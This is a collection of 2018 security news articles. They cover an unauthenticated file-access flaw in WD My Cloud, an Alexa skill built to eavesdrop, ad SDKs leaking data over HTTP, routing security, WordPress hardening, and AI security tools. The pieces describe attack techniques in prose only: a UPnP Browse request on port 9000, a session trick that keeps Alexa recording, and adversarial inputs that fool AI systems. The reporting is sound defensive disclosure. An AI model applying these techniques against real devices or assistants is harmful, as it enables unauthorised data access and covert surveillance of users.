The default configuration on the new Western Digital My Cloud EX2 storage device allows any users on the network to retrieve files via HTTP requests, Trustwave has discovered.

WD’s My Cloud represents a highly popular storage/backup device option, allowing users to easily backup important data (including documents, photos, and media files) and store it on removable media.

The new drive, however, exposes data to any unauthenticated local network user, because of a Universal Plug and Play (UPnP) media server that the device automatically starts when powered on.

By default, it allows any users capable of sending HTTP requests to the drive to grab any files from the device. Thus, any permissions or restrictions set by the owner or administrator are completely bypassed, Trustwave’s security researchers warn.

“It is possible to access files on the storage even when Public shares are disabled. Specifically, anyone can issue HTTP requests to TMSContentDirectory/Control on port 9000 passing various actions. The Browse action returns XML with URLs to individual files on the device,” the security firm explains in an advisory.

The researchers also published a proof-of-concept, explaining that an attacker needs to include XML with Browse action in the HTTP request to port 9000 asking for the TMSContentDirectory/Control resource. This will result in the UPnP server responding with a list of files on the device.

Next, the attacker can use HTTP requests to fetch the actual files from the device, given that they are already in the possession of the URLs leading to those files (from the response collected at the previous step).

Unfortunately, there is no official fix to address the vulnerability. WD was informed on the issue in January, but the company said they wouldn’t release a patch.

The My Cloud content can be accessed from the local network when Twonky DLNA Media Server is enabled because the server does not support authentication and is broadcast to any DLNA client without any authentication mechanism.

To ensure their data remains protected, users should keep sensitive data in a Password protected My Cloud Share. They are also advised to disable Twonky DLNA Media Server for the entire My Cloud or to disable Media Serving for Shares containing sensitive data.

Instructions on how to disable Twonky DLNA Media Server are available in this knowledge base article.


Hacking the Amazon Alexa virtual assistant to spy on unaware users
27.4.2018 securityaffairs Security

Checkmarx experts created a proof-of-concept Amazon Echo Skill for Alexa that instructs the device to eavesdrop on users’ conversations and then sends the transcripts to a website controlled by the attackers.
The Alexa virtual assistant could be abused by attackers to spy on consumers with smart devices.

Researchers at security firm Checkmarx created a proof-of-concept Amazon Echo Skill for Alexa that instructs the device to indefinitely record surround voice to secretly eavesdrop on users’ conversations and then sends the transcripts to a website controlled by the attackers.

Amazon allows developers to build custom Skills that can control voice-activated smart devices such as Amazon Echo Show, Echo Dot, and Amazon Tap.

The rogue Echo Skill for Alexa is disguised as a simple math calculator, once installed it will be activated in the background after a user says “Alexa, open calculator.”

“The Echo is continuously listening for the user’s voice. So when the user says “Alexa, open calculator”, the calculator skill is initialized and the API\Lambda-function that’s associated with the skill receives a launch request as an input.” reads the report published by Checkmarx.

Alexa amazon hack

The experts at Checkmarx were able to build a feature that kept the Alexa session up so Alexa would continue listening and customers were not able to detect Alexa’s activity.

The experts manipulated the code used in a built-in JavaScript library (ShouldEndSession) that is used to halt the device from listening if it doesn’t receive voice commands.

“The combination of a session that is still open (shouldEndSession=false) and an un-noticeable (empty) reprompt with a record intent as described above is that even after the user ends the regular functionality of the skill (math calculation within the calculator), the skill will continue to record, will capture the spoken words and send them to a log.” continues the report.

“As long as it will recognize speech and will pick up words, the eavesdropping will continue. Even the default 8-second grace of Alexa prior to closing the skill (in case of silence) will be doubled to 16 seconds due to a silence re-prompt.”

Checkmarx published a video proof-of-concept to show that Alexa can spy on users once they have opened up a session with the calculator app. A second session is created without prompting the user that the microphone is still active.

Any recorded audio is transcribed and transcripts are then sent to the attackers. Checkmarx reported his findings to Amazon that addressed the problem on April 10.

In November 2017, researchers at security firm Armis reported that millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, were affected by the Blueborne vulnerabilities.

Virtual assistants are powerful technologies by dramatically enlarge our surface of attack, for this reason, it is essential to develop them with a security-by-design approach.


Leaking ads
24.4.18 Kaspersky  Security
When we use popular apps with good ratings from official app stores we assume they are safe. This is partially true – usually these apps have been developed with security in mind and have been reviewed by the app store’s security team. However, we found that because of third-party SDKs many popular apps are exposing user data to the internet, with advertising SDKs usually to blame. They collect user data so they can show relevant ads, but often fail to protect that data when sending it to their servers.

During our research into dating app security, we found that some analyzed apps were transmitting unencrypted user data through HTTP. It was unexpected behavior because these apps were using HTTPS to communicate with their servers. But among the HTTPS requests there were unencrypted HTTP requests to third-party servers. These apps are pretty popular, so we decided to take a closer look at these requests.

HTTP request with unencrypted user data

One of the apps was making POST requests to the api.quantumgraph[.]com server. By doing so it was sending an unencrypted JSON file to a server that is not related to the app developers. In this JSON file we found lots of user data, including device information, date of birth, user name and GPS coordinates. Furthermore, this JSON contained detailed information about app usage that included information about profiles liked by the user. All this data was sent unencrypted to the third-party server and the sheer volume makes it really scary. This is due to the use of a qgraph analytics module.

Unencrypted user data sent by app

Two other dating apps from our research were basically doing the same. They were using HTTPS to communicate with their servers, but at the same time there were HTTP requests with unencrypted user data being sent to a third-party server. This time it was another server belonging not to an analytics company but to an advertising network used by both dating apps. Another difference was GET HTTP requests with user data being used as parameters in a URL. But in general these apps were doing the same thing – transmitting unencrypted user data to third-party servers.

List of HTTP requests from advertising SDK

At this point it already looked bad, so I decided to check my own device, collecting network activity for one hour. It turned out to be enough to identify unencrypted requests with my own data. And again the cause of these requests was a third-party SDK used by a popular app. It was transmitting my location, device information and token for push messages.

HTTP request from my device with my own unencrypted data

So I decided to take a look at those dating apps with the leaking SDKs to find out why it was happening. It came as no surprise that they were used by more than one third party in these apps – in fact, every app contained at least 40 different modules. They make up a huge part of these apps – at least 75% of the Dalvik bytecode was in third-party modules; in one app the proportion of third-party code was as high as 90%.

List of modules from analyzed dating apps

Developers often use third-party code to save time and make use of existing functionality. This makes perfect sense and allows developers to focus on their own ideas instead of working on something that has already been developed many times before. However, this means developers are unlikely to know all the details of the third-party code used and it may contain security issues. That’s what happened with the apps from our research.

Getting results
Knowing that there are popular SDKs exposing user data and that almost every app uses several SDKs, we decided to search for more of these apps and SDKs. To do so we used network traffic dumps from our internal Android sandbox. Since 2014 we have collected network activities from more than 13 million APKs. The idea is simple – we install and launch an app and imitate user activity. During app execution we collect logs and network traffic. There is no real user data, but to the app it looks like a real device with a real user.

We searched for the two most popular HTTP requests – GET and POST. In GET requests user data is usually part of the URL parameters, while in POST requests user data is in the Content field of the request, not the URL. In our research, we looked for apps transmitting unencrypted user data using at least one of these requests, though many were exposing user data in both requests.

We were able to identify more than 4 million APKs exposing some data to the internet. Some of them were doing it because their developers had made a mistake, but most of the popular apps were exposing user data because of third-party SDKs. For each type of request (GET or POST) we extracted the domains where apps were transmitting user data. Then we sorted these domains by app popularity – how many users had these apps installed. That’s how we identified the most popular SDKs leaking user data. Most of them were exposing device information, but some were transmitting more sensitive information like GPS coordinates or personal information.

Four most popular domains where apps were exposing sensitive data through GET requests
mopub.com
This domain is part of a popular advertising network. It was used by the two dating apps mentioned at the beginning of this article. We found many more popular apps with this SDK – at least five of them have more than 100 million installations according to Google Play Store and many others with millions of installations.

It transmits the following data in unencrypted form:

device information (manufacturer name, model, screen resolution)
network information (MCC, MNC)
package name of the app
device coordinates
Key words

HTTP request with user data in URL

Key words are the most interesting part of the transmitted data. They can vary depending on app parameter settings. In our data there was usually some personal information like name, date of birth and gender. Location needs to be set by an app too – and usually apps provide GPS coordinates to the advertising SDK.

We found several different versions of this SDK. The most common version was able to use HTTPS instead of HTTP. But it needs to be set by the app developers and according to our findings they mostly didn’t bother, leaving the default value HTTP.

Advertising SDK using HTTP by default

rayjump.com
This domain is also part of a popular advertising network. We found two apps with more than 500 million installations, seven apps with more than 100 million installations and many others with millions of installations.

It transmits the following data:

device information (manufacturer name, model, screen resolution, OS version, device language, time zone, IMEI, MAC)
network information (MCC, MNC)
package name of the app
device coordinates
We should mention that while most of this data was transmitted in plain text as URL parameters, the coordinates, IMEI and MAC address were encoded with Base64. We can’t say they were protected, but at least they weren’t in plain text. We were unable to find any versions of this SDK where it’s possible to use HTTPS – all versions had HTTP URLs hardcoded.

Advertising SDK collects device location

tapas.net
Another popular advertising SDK that collects the same data as the others:

device information (manufacturer name, model)
network operator code
package name of the app
device coordinates
We found seven apps with more than 10 million installations from Google Play Store and many other apps with fewer installations. We were unable to find any way for the developers to switch from HTTP to HTTPS in this SDK either.

appsgeyser.com
The fourth advertising SDK is appsgeyser and it differs from the others in that it is actually a platform to build an app. It allows people who don’t want to develop an app to simply create one. And that app will have an advertising SDK in it that uses user data in HTTP requests. So, these apps are actually developed by this service and not by developers.

They transmit the following data:

device information (manufacturer name, model, screen resolution, OS version, android_id)
network information (operator name, connection type)
device coordinates
We found a huge amount of apps that have been created with this platform and are using this advertising SDK, but most of them are not very popular. The most popular have just tens of thousands of installations. However, there really are lots of these apps.

Screenshot of appsgeyser.com

According to the appsgeyser.com web page there are more than 6 million apps with almost 2 billion installations between them. And they showed almost 200 billion ads – probably all via HTTP.

Four most popular domains where apps were exposing sensitive data through POST requests
ushareit.com
All apps posting unencrypted data to this server were created by the same company, so it isn’t because of third-party code. But these apps are very popular – one of them was installed more than 500 million times from Google Play Store. These apps collect a large amount of device information:

manufacturer name
model
screen resolution
OS version
device language
country
android_id
IMEI
IMSI
MAC

Device information collected by the app

This unencrypted data is then sent to the server. Furthermore, among the data they are uploading is a list of supported commands – one of them is to install an app. The list of commands is transmitted in plain text and the answer from the server is also unencrypted. This means it can be intercepted and modified. What is even worse about this functionality is that the app can silently install a downloaded app. The app just needs to be a system app or have root rights to do so.

Fragment of code related to the silent installation of apps upon command from the server

Lenovo
Here is another example of popular apps leaking user data not because of third-party code but because of a mistake by developers. We found several popular Lenovo apps collecting and transmitting unencrypted device information:

IMEI
OS version
language
manufacturer name
model
screen resolution

HTTP request with unencrypted device information

This information is not very sensitive. But we found several Lenovo apps that were sending more sensitive data in unencrypted form, such as GPS coordinates, phone number and email.

App code for the collection of device coordinates and other data

We reported these issues to Lenovo and they fixed everything.

Nexage.com
This domain is used by a very popular advertising SDK. There are tons of apps using it. One of them even has more than 500 million installations and seven other apps have more than 100 million installations. Most of the apps with this SDK are games. There are two interesting things about this SDK – the transmitted data and the protocol used.

This SDK sends the following data to the server:

device information (screen resolution, storage size, volume, battery level)
network information (operator name, IP address, connection type, signal strength)
device coordinates
It also sends information about hardware availability:

Front/rear camera availability
NFC permission
Bluetooth permission
Microphone permission
GPS coordinates permission

Advertising SDK that collects information about device hardware features

It may also send some personal information, such as age, income, education, ethnicity, political view, etc. There’s no magic involved – the SDK has no way of finding this information unless the apps that are using this SDK provide it. We have yet to see any app providing these details to the SDK, but we think users should be aware of the risks when entering such details to apps. The information could be passed on to the SDK and the SDK could expose it to the internet.

Advertising SDK could send personal information

The second interesting thing about this SDK is that it uses HTTPS to transmit data, but usually only for the initial communication. After that it may receive new configuration settings from the server that specify an HTTP URL. At least that’s what happened on my device and several other times with different apps on our test devices.

HTTPS URL in advertising SDK

Quantumgraph.com
Another SDK that is leaking data uses the quantumgraph.com domain. This is an analytics SDK, not an advertising one. We found two apps with more than 10 million installations from Google Play Store and another seven apps with more than a million installations. More than 90% of detected users with this SDK were from India.

This SDK posts JSON files with data via HTTP. The data may vary from app to app because it’s an analytics SDK and it sends information provided by the app. In most cases, the following items are among the sent data:

Device information
Personal information
Device coordinates
App usage

List of installed apps were sent in unencrypted form to the server

In the case of the dating app, there were likes, swipes and visited profiles – all user activity.

App usage was sent in unencrypted form to the server

This SDK was using a hardcoded HTTP URL, but after our report they created a version with an HTTPS URL. However, most apps are still using the old HTTP version.

Other SDKs
Of course, there are other SDKs using HTTP to transmit user data, but they are less popular and almost identical to those described above. Many of them expose device locations, while some also expose emails and phone numbers.

Phone number and email collected by an app to be sent via HTTP

Other findings
During our research, we found many apps that were transmitting unencrypted authentication details via HTTP. We were surprised to discover how many apps are still using HTTP to authenticate their services.

Unencrypted request with authentication token

They weren’t always transmitting user credentials – sometimes they were credentials for their services (for example databases) too. It makes no sense having credentials for such services because they are exposed to the internet. Such apps usually transmit authentication tokens, but we saw unencrypted logins and passwords too.

Unencrypted request with credentials

Malware
Digging into an HTTP request with unencrypted data allowed us to discover a new malicious site. It turns out that many malicious apps use HTTP to transmit user data too. And in the case of malware it is even worse because it can steal more sensitive data like SMSs, call history, contacts, etc. Malicious apps not only steal user data but expose it to the internet making it available for others to exploit and sell.

Leaked data
In this research we analyzed the network activity of more than 13 million APK files in our sandbox. On average, approximately every fourth app with network communications was exposing some user data. The fact that there are some really popular apps transmitting unencrypted user data is significant. According to Kaspersky Lab statistics, on average every user has more than 100 installed apps, including system and preinstalled apps, so we presume most users are affected.

In most cases these apps were exposing:

IMEI, International Mobile Equipment Identities (unique phone module id) which users can’t reset unless they change their device.
IMSI, International Mobile Subscriber Identities (unique SIM card id) which users can’t reset unless they change their SIM card.
Android ID – a number randomly generated during the phone’s setup, so users can change it by resetting their device to factory settings. But from Android 8 onwards there will be a randomly generated number for every app, user and device.
Device information such as the manufacturer, model, screen resolution, system version and app name.
Device location.
Some apps expose personal information, mostly the user’s name, age and gender, but it can even include the user’s income. Their phone number and email address can also be leaked.

Why is it wrong?
Because this data can be intercepted. Anyone can intercept it on an unprotected Wi-Fi connection, the network owner could intercept it, and your network operator could find out everything about you. Data will be transmitted through several network devices and can be read on any of them. Even your home router can be infected – there are many examples of malware infecting home routers.

Without encryption this data is being exposed as plain text and can be simply extracted from the requests. By knowing the IMSI and IMEI anyone can track your data from different sources – you need to change both the SIM card and device at the same time to change them. Armed with these numbers, anyone can collect the rest of your leaking data.

Furthermore, HTTP data can be modified. Someone could change the ads being displayed or, even worse, change the link to an app. Because some advertising networks promote apps and ask users to install them, it could result in malware being downloaded instead of the requested app.

Apps can intercept HTTP traffic and bypass the Android permission system. Android uses permissions to protect users from unexpected app activity. This involves apps declaring what access they will need. Starting from Android 6, all permissions have been divided into two groups – normal and dangerous. If an app needs dangerous permissions, it has to ask the user for permission in runtime, not just before installation. So, in order to get the location, the app will need to ask the user to grant access. And to read the IMEI or IMSI the app will also need to ask the user for access, because this is classified as a dangerous permission.

But an app can add a proxy to Wi-Fi settings and read all the data being transmitted from other apps. To do so it needs to be a system app or be provisioned as the Profile or Device Owner. Or an app can set a VPN service on the device transmitting user data to its server. After that the app can find out the device’s location without accessing it just by reading the HTTP requests.

Future

HTTP (blue) and HTTPS (orange) usage in apps since March 2014

Starting from the second half of 2016, more and more apps have been switching from HTTP to HTTPS. So, we are moving in the right direction, but too slowly. As of January 2018, 63% of apps are using HTTPS but most of them are still also using HTTP. Almost 90% of apps are using HTTP. And many of them are transmitting unencrypted sensitive data.

Advice for developers
Do not use HTTP. You can expose user data, which is really bad.
Turn on 301 redirection to HTTPS for your frontends.
Encrypt data. Especially if you have to use HTTP. Asymmetric cryptography works great.
Always use the latest version of an SDK. Even if it means additional testing before the release. This is really important because some security issues could be fixed. From what we have seen, many apps do not update third-party SDKs, using outdated versions instead.
Check your app’s network communications before publishing. It won’t take more than a few minutes but you will be able to find out if any of your SDKs are switching from HTTPS to HTTP and exposing user data.
Advice for users
Check your app permissions. Do not grant access to something if you don’t understand why. Most apps do not need access to your location. So don’t grant it.
Use a VPN. It will encrypt the network traffic between your device and external servers. It will remain unencrypted behind the VPN’s servers, but at least it’s an improvement.


Internet Society Calls on IXPs to Help Solve Internet Routing Problems
23.4.2018 securityweek Security

The Internet Society is expanding its Mutually Agreed Norms for Routing Security (MANRS) initiative from just autonomous systems (AS) networks to include internet exchange points (IXPs).

With its purpose to bring basic security to internet routing, MANRS was launched in 2014 with 9 founding members. Since its launch it has grown to 56 members, out of a total of around 60,000 ASs on the internet. Andrei Robachevsky, the Internet Society's technology program manager, told SecurityWeek that the immediate target is between 700 and 800 actively conforming members. Since about 80% of all networks are stub networks with no knowledge of other networks, Robachevsky believes that 700 or 800 of the remaining networks will be enough to provide the tipping point necessary to seriously improve internet routing security.

It is currently a major problem. Each AS 'announces' its customers to other networks so that traffic can reach its intended destination. The protocol used is border gateway protocol (BGP) -- but this was developed in the mid-1990s for resilience, simplicity and ease of deployment. It has no built-in security of its own. There is nothing in the protocol to tell one network that what it hears from another network is true or false. There are out-of-band authoritative databases that can verify the information, but since this data is incomplete, it is not often used.

This basic lack of routing verification between different ASs is the root cause of both accidental and malicious internet routing problems. There are three primary issues: route hijacking, IP Address spoofing, and route leaks -- and it is worth noting that there were 14,000 internet routing issues in 2017 alone.

The classic example of route hijacking occurred in 2008, when YouTube became unavailable for around 2 hours. It is often that that this was an intentional accident: the intent existed, but the full effect wasn't expected. Pakistan Telecom announced that YouTube was a customer. Without verifying this announcement, its upstream provider PCCW forwarded the announcement to the rest of the world. The result was that all traffic intended for YouTube was instead sent to Pakistan Telecom.

In April 2017, Robachevsky wrote in an Internet Society blog, "Large chunks of network traffic belonging to MasterCard, Visa, and more than two dozen other financial services companies were briefly routed through a Russian telecom. For several minutes, Rostelecom was originating 50 prefixes for numerous other Autonomous Systems, hijacking their traffic."

IP address spoofing can be used for different malicious purposes. One of the most dramatic is a reflection/amplification DDoS attack. The attacker spoofs the address of the target, and then uses amplification and reflection to direct large amounts of data at the victim. This year, memcached has been used to amplify DDoS attacks sufficient to set new records -- first at 1.3Tbps and then within days at 1.7Tbps.

If a sufficient number of ASs adopt the MANRS principles, then reflection/amplification DDoS attacks will simply cease to be a problem because address spoofing will be recognized and refused.

Route leaks can occur when a network accidentally announces the wrong information. Dyn described an example in 2014. "When a transit customer accidentally announces the global routing table back to one of its providers, things get messy. This is what happened earlier today and it had far-reaching consequences." In this instance it caused disruptions in traffic "in places as far-flung from the USA as Pakistan and Bulgaria."

MANRS seeks to get network providers to comply with just four basic principles: to filter announcements to ensure their accuracy; to prevent IP address spoofing; to improve coordination between networks; and for each network to ensure that its own part of the global validation network is accurate. The problem now is for the Internet Society to expand the MANRS community membership from just 56 to the 700 or 800 -- Robachevsky's tipping-point -- to really make a difference.

To achieve this, the Internet Society has today launched the MANRS IXP program with ten founding IXP members. The hope is that IXPs -- some of which have as many as 600 ASs connecting with them -- will contribute directly to improving routing security while also acting as ambassadors for the program.

"If we can get them on board as ambassadors to promote MANRS within their communities," commented Robachevsky, "it becomes a great way to scale up. But they can also tangibly contribute to routing security. They run so-called route servers. Instead of asking everyone to connect to everyone, each of their members can just connect to the IXP's proxy network for routing information. This means that the route server itself can do the validation since each route server already knows its user networks. Filters installed here can recognize misconfigured or false announcements and can just drop incorrect announcements. If this happens, we're creating a very secure peering environment which is a big step to overall internet routing security."

The difficulty for the Internet Society is that signing up to MANRS -- either as an individual AS or as an IXP -- does nothing to protect the member directly. It helps to protect other networks, and each network is really reliant on other networks protecting them. To make it as easy as possible for IXPs to join the program, there are only three requirements: two essential requirements and at least one from three optional requirements.

The essential commitments are to facilitate the prevention of the propagation of incorrect routing information, and to promote MANRS to the IXP's own membership. The three optional commitments (each IXP must commit to at least one of them) are, to protect the peering platform, to facilitate global operational communication and coordination between network operators, and to provide monitoring and debugging tools to members.

"The founding participants of the MANRS IXP Program understand the importance of having a more resilient and secure Internet routing system," said Robachevsky. "The IXP community is integral to the Internet ecosystem and by joining MANRS, they are joining a community of security-minded network operators committed to making the global routing infrastructure more secure."

If PCCW had implemented MANRS, then the Pakistan Telecom hijack of YouTube could not have happened. If PCCW had not implemented MANRS, but IXPs had done so, then the hijack would have been stopped at the peering points.


Take These Steps to Secure Your WordPress Website Before It’s Too Late
23.4.2018 securityaffairs  Security

You might have heard that WordPress security is often referred to as hardening, WordPress website security is all about putting locks on doors and windows and having lookouts on each of your “towers.”
You might have heard that WordPress security is often referred to as “hardening.” While the name might cause a few eyebrows to raise, overall, it makes sense. To clarify, the process of adding security layers is similar to boosting the reinforcements to your home, castle, or fort. In other words, WordPress website security is all about putting locks on doors and windows and having lookouts on each of your “towers.”

While this may be all good, what can you genuinely do to improve your website’s security – at the same time giving your readers and customers the guarantee that their sensitive information won’t fall into the wrong hands?

Wordpress website security

1. Perform all WordPress updates
Although it can seem impossible that something as simple as keeping up with updates would make any difference, in actuality, it does have a considerable impact. This means that whenever you log in and see the “Update Available” notification, you should make time to click. Of course, this is where having regular back-ups will also give your peace of mind that at the end of the process nothing will be broken.

2. Add Two-Step Authentication
Another excellent way to prevent force attacks on your site is by setting up a much-needed two-step authentication process. If you have it for your Gmail or Yahoo account, then you should definitely have one for a website which could be used by hundreds or more users.

The two-step measure means that you’ll be asked to input a password after a code is sent to your phone or email. Often, the second login code is sent via SMS, but you change that to your preferences.

You also have the option of adding different plug-ins, including Google Authenticator, Clef, or Duo Two-Factor Authentication.

3. Panic Button: Website Lockdown
The lockdown feature is commonly enabled when multiple failed login attempts are made, which can help against pesky and persistent brute force attempts. In this case, whenever a hacker tries to input the wrong password multiple times, the website shuts down and displays an “error” message –all while you get notified of this unauthorized activity.

Again, you can use different plug-ins to use, and one of our favorites is the iThemes Security – by using it, you can directly specify a certain number of failed login attempts after which the system bans the attacker’s IP address.

4. Use Your Email to Login
When trying to sign in, you have to choose a username. Our recommendation would be using an email ID instead of a username since the latter is more accessible to predict and hack. Plus, WordPress website accounts require a unique email address, which adds another layer of security.

5. Use SSL To Encrypt Data
SSL, otherwise known as a Secure Socket Layer, is a smart way of securing the admin panel by yourself –making sure that the transfer of data between the server and users is safe.

Overall, this measure makes it hard for hackers to breach the connection or spoof your info, and the best part is that getting an SSL certificate for your WordPress website is a piece of cake. While you can separately purchase one from a dedicated company, you can also ask your hosting solution to provide you with one – it may even be an option that comes with their package.

SSL, otherwise known as a Secure Socket Layer, is a smart way of securing the admin panel by yourself –making sure that the transfer of data between the server and users is safe.

Overall, this measure makes it hard for hackers to breach the connection or spoof your info, and the best part is that getting an SSL certificate for your WordPress is a piece of cake. While you can separately purchase one from a dedicated company, you can also ask your hosting solution to provide you with one – it may even be an option that comes with their package.

All SSL certificates have an expiration date, meaning that they’ll need to be reissued. In some cases you’ll need to manually approve or cancel your certificate. Because each email handles things a bit differently, you should go to your hosting provider for more information. Alternatively, go to the site of Bluehost, as there is a whole section on how you can accept the new SSL into your application.

After all, it’s noteworthy to realize that an SSL certificate will also affect how your website ranks on Google because sites which incorporate SSLs are more secure – ultimately leading to more traffic.

6. Backup your WordPress website
We’re briefly mentioned this point before, but just to emphasize the importance, you have to get into the habit of organizing scheduled backups. Why is it important? Well, because, for example, if your site is compromised, you’ll be able to restore a prior version with losing your data. There are multiple automated solutions out there, including BackupBuddy, VaultPress, and many others.

Another great advice is using reliable hosting solutions which can ensure consistent backups of information, helping you achieve greater peace of mind. For example, Bluehost is excellent at protecting your business from involuntary data loss. To learn more and use their coupon to get a discount, go to the site.

7. Cut Back on Plugin Use
Although it may seem hard, you should make the effort of limiting the total number of plugins you install on your site. You need to be picky because it’s not just about security –it’s about overall performance.

To better explain, loading your website with numerous plugins will slow it down significantly. Thus, if you don’t need it, take the minimalist approach and skip it. Also, the fewer plugins you have, the fewer chances you give hackers to access your info. Two birds with one stone.

8. Hide Author Usernames
When you leave the WordPress defaults just as they are, it can be effortless to find the author’s username. Moreover, it’s not uncommon that the primary author on the site is also the administrator, which makes things even easier for hackers. At any point that you’re handing your information up to hackers on a silver plate, you are maximizing the chances that your site will eventually be compromised.

According to experts, including the well-regarded DreamHost, it’s good practice to hide the author’s username. It’s relatively easy to achieve, as you need to add some code to your site. Once that is done and dusted, the code will act as a curtain or veil where the admin’s information won’t be displayed by using an input – instead, they will be sent back to your homepage.


IBM Releases Open Source AI Security Tool
17.4.2018 securityweek Security

IBM today announced the release of an open source software library designed to help developers and researchers protect artificial intelligence (AI) systems against adversarial attacks.

The software, named Adversarial Robustness Toolbox (ART), helps experts create and test novel defense techniques, and deploy them on real-world AI systems.

There have been significant developments in the field of artificial intelligence in the past years, up to the point where some of the world’s tech leaders issued a warning about how technological advances could lead to the creation of lethal autonomous weapons.

Some of the biggest advances in AI are a result of deep neural networks (DNN), sophisticated machine learning models inspired by the human brain and designed to recognize patterns in order to help classify and cluster data. DNN can be used for tasks such as identifying objects in an image, translations, converting speech to text, and even for finding vulnerabilities in software.

While DNN can be highly useful, one problem with the model is that it’s vulnerable to adversarial attacks. These types of attacks are launched by giving the system a specially crafted input that will cause it to make mistakes.

For example, an attacker can trick an image recognition software to misclassify an object in an image by adding subtle perturbations that are not picked up by the human eye but are clearly visible to the AI. Other examples include tricking facial recognition systems with specially designed glasses, and confusing autonomous vehicles by sticking patches onto traffic signs.

AI adversarial attack - Credit: openai.com

IBM’s Python-based Adversarial Robustness Toolbox aims to help protect AI systems against these types of threats, which can pose a serious problem to security-critical applications.

According to IBM, the platform-agnostic library provides state-of-the-art algorithms for creating adversarial examples and methods for defending DNN against them. The software is capable of measuring the robustness of the DNN, harden it by augmenting the training data with adversarial examples or by modifying its architecture to prevent malicious signals from propagating through its internal representation layers, and runtime detection for identifying potentially malicious input.

“With the Adversarial Robustness Toolbox, multiple attacks can be launched against an AI system, and security teams can select the most effective defenses as building blocks for maximum robustness. With each proposed change to the defense of the system, the ART will provide benchmarks for the increase or decrease in efficiency,” explained IBM’s Sridhar Muppidi.

IBM also announced this week that it has added intelligence capabilities to its incident response and threat management products.


Symantec Releases Targeted Attack Analytics Tool
16.4.2018 securityweek Security

Symantec is releasing its own targeted attack analytics (TAA) tool to existing Symantec Advanced Threat Protection (ATP) customers free of additional charge. It is the same tool that Symantec's researchers use, and was used to uncover Dragonfly 2.0. Its primary purpose is to uncover stealthy and targeted attacks.

Symantec's data scientists developed TAA by applying artificial intelligence machine learning to the process, knowledge and capabilities of the firm's own security experts and researchers. These researchers have a long and successful history of detecting and analyzing global cyber threats. The reasoning behind TAA was to automate the task of analyzing the vast pool of telemetry gathered from the Symantec global customer base with the expertise of its human researchers; that is, to automate those tasks previously performed by human analysts -- finding more things, faster, with the help of advanced analytics.

Now made available to customers, TAA analyzes incidents within the network against incidents discovered within one of the largest threat data lakes in the world. Since its inception, TAA has been used by Symantec to detect security incidents at more than 1,400 organizations, and to help track around 140 organized hacking groups.

It functions by uncovering suspicious activity in individual endpoints and collating that information to determine whether individual actions indicate stealthy malicious activity. "Security has changed a lot over the last couple of decades," commented Eric Chien, distinguished engineer at Symantec, in a blog post. "It used to be a question of defending a single machine and making sure that it was protected. That's no longer the case."

This is particularly relevant to today's stealthy, targeted attacks. With criminals increasingly making use of built-in OS tools in fileless attacks, individual actions on one endpoint need to be analyzed in the context of actions on other systems. Kevin Haley, director of Symantec's Security Technology and Response Group comments, "You have to bring your security data together because if something is happening in one place and something else is happening in another, by themselves that may not have meaning."

"Symantec's team of cyber analysts has a long history of uncovering the world's most high-profile cyber-attacks and now their deep understanding of how these attacks unfold can be put to use by our customers without the need to employ a team of researchers," said Greg Clark, Symantec CEO. "Targeted Attack Analytics uses advanced analytics and machine learning to help shorten the time to discovery on the most targeted and dangerous attacks and to help keep customers and their data safe."

TAA continuously learns from and adapts to the evolving attack methods used by increasingly sophisticated criminals and nation-state actors, and the cloud-based approach enables the frequent re-training and updating of analytics to adapt to the new attack methods without the need for product updates.

"Up until now, we've had the telemetry and data necessary to uncover the warning signs of dangerous targeted attacks, but the industry has lacked the technology to analyze and code the data quickly," said Chien. "With TAA, we're taking the intelligence generated from our leading research teams and uniting it with the power of advanced machine learning to help customers automatically identify these dangerous threats and take action."

TAA, says the blog, "merges the best threat hunting talent in the business with machine learning and AI and productizes it, putting in our customers hands, the most sophisticated advance threat detection possible." It is available now as part of Symantec's Integrated Cyber Defense Platform for Symantec Advanced Threat Protection (ATP) customers.


Improved Visibility a Top Priority for Security Analysts
6.4.2018 securityweek  Security

Security Analysts Require Improved Visibility as well as Improved Threat Detection

Vendors listen to existing and potential customers to understand how to improve their products over time. At the smallest level, they use focus groups. At the largest level they employ market research firms to query thousands or more respondents from relevant employments and industry sectors. Some way in-between, they run their own relatively small-scale surveys primarily for their own benefit.

This is what Boston, MA-based next-gen endpoint protection firm Barkly did, querying some 70 IT and security professionals to understand what mid-market users look for and are not currently getting from their endpoint security controls. Not surprisingly, 60% of the respondents say that adding to or improving protection is their top priority -- possibly because 88% of them consider that there are types of attacks (for example, the growing practice of employing fileless attacks) that current security simply does not block.

More surprising, however, is that 40% of the respondents prioritize improving forensic and response capabilities as their current top priority. This may partly be driven by the new breed of regulations -- and in particular, GDPR -- that demand increasingly rapid incident disclosure, and remediation of the breach vector to prevent repeats.

Alternatively, this may simply be down to a high ratio of alerts (including both true-positives and false-positives) to human-resources with their current products. While the sample size of the survey is small, forty-five percent of the respondents, Barkly says, "admit they currently don’t have enough time to investigate and respond to the incidents they’re already seeing now. Adding to that workload with complex endpoint detection and response (EDR) solutions without considering current limitations is obviously not a productive answer."

The need for improved automation to reduce the time for manual involvement also shows in users' top frustrations with current solutions. Twenty-seven percent of the respondents are concerned with poor visibility into incidents, and 25% are concerned about limited investigative/response features. A further 18% find current solutions difficult and time-consuming to manage.

The need to make incident response faster and simpler is the driving force behind Barkly's new version 3.0 launched today. Rapid response comes from two new features: endpoint isolation; and file quarantine and delete. The first enables an administrator to instantly remove an affected device from the network while the incident is investigated.

This is a one-click operation via the Barkly CommandIQ management portal, and can be enacted from any location, on- or off-site at any time via any remote or mobile device with internet access. As soon as the affected device is cleaned or confirmed to be clean, it can just as easily be returned to the network. It means that both an alert and its response can be handled instantly without requiring the security administrator to be in his office or to return to his office first.

The second feature automatically quarantines a blocked malicious executable. This instantly contains the threat, but maintains administrative access to the file for further investigation before deletion. Again, this can be performed either from the administrator's office desktop, or remotely via a mobile device.

A further two new features help analysts to investigate incidents. The first provides an automated interactive method for users to provide context, which is fed back to the analyst, whenever a file or process is blocked. The second is Incident Path Visualization, enabling analysts to trace malicious processes back to their origins.

Together, these features provide rapid forensic insight into the cause of the incident, allowing the security team to leverage the insights gained to improve their security going forwards.

Barkly version 3.0 adds the ability for automated and rapid response to its existing machine-learning threat detection engine. Its ability to do this via any mobile device means there is no delay if an incident occurs while administrators are off-site. The intention is to enable existing staff levels to handle workloads more efficiently without being stretched too thin, and without requiring additional company manpower.


Grindr shared people’ HIV status with other companies
3.4.2018 securityaffairs Security

An analysis conducted by the Norwegian research nonprofit SINTEF revealed that the popular Grindr gay dating app is sharing its users’ HIV status with two other companies.
